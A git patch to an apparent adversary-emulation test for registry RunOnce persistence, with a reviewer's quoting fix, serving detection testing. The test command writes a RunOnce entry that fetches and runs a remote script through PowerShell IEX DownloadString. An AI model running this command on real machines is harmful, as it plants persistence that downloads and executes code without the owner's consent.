From aae45a1937a2fc577d8bd4711a5eeba216e09738 Mon Sep 17 00:00:00 2001
From: dwhite9
Date: Mon, 2 Mar 2020 14:31:26 -0600
Subject: [PATCH] fixed RunOnce cleanup command by adding extra input argument for reg (#852)

key.

Co-authored-by: Carrie Roberts
---
 atomics/T1060/T1060.yaml | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/atomics/T1060/T1060.yaml b/atomics/T1060/T1060.yaml
index 3c740b16..3723d405 100644
--- a/atomics/T1060/T1060.yaml
+++ b/atomics/T1060/T1060.yaml
@@ -47,10 +47,15 @@ atomic_tests:
 description: Thing to Run
 type: Path
 default: powershell.exe
+ reg_key_path:
+ description: Path to registry key to update
+ type: Path
+ default: HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce
 executor:
 name: powershell
+ elevation_required: true
 command: |
- $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
+ $RunOnceKey = "#{reg_key_path}"
 set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 cleanup_command: |
- Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force -ErrorAction Ignore
+ Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore
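Review bot: The new cleanup line passes `#{reg_key_path}` to `-Path` unquoted, while the new `$RunOnceKey = "#{reg_key_path}"` line in `command` quotes it; a user-supplied key path containing a space would be split into separate arguments, and because `-ErrorAction Ignore` suppresses the failure the "NextRun" entry would silently survive cleanup and still fire at the next logon. Quote it the same way as the command side: `Remove-ItemProperty -Path "#{reg_key_path}" -Name "NextRun" -Force -ErrorAction Ignore`. The argument's description could also say what the value is and why it matters, e.g. `description: PowerShell provider path of the Run/RunOnce key to write (cleanup removes the "NextRun" value from the same key)`, since `elevation_required: true` is only needed for the HKLM default and a user-scoped key changes what the test exercises.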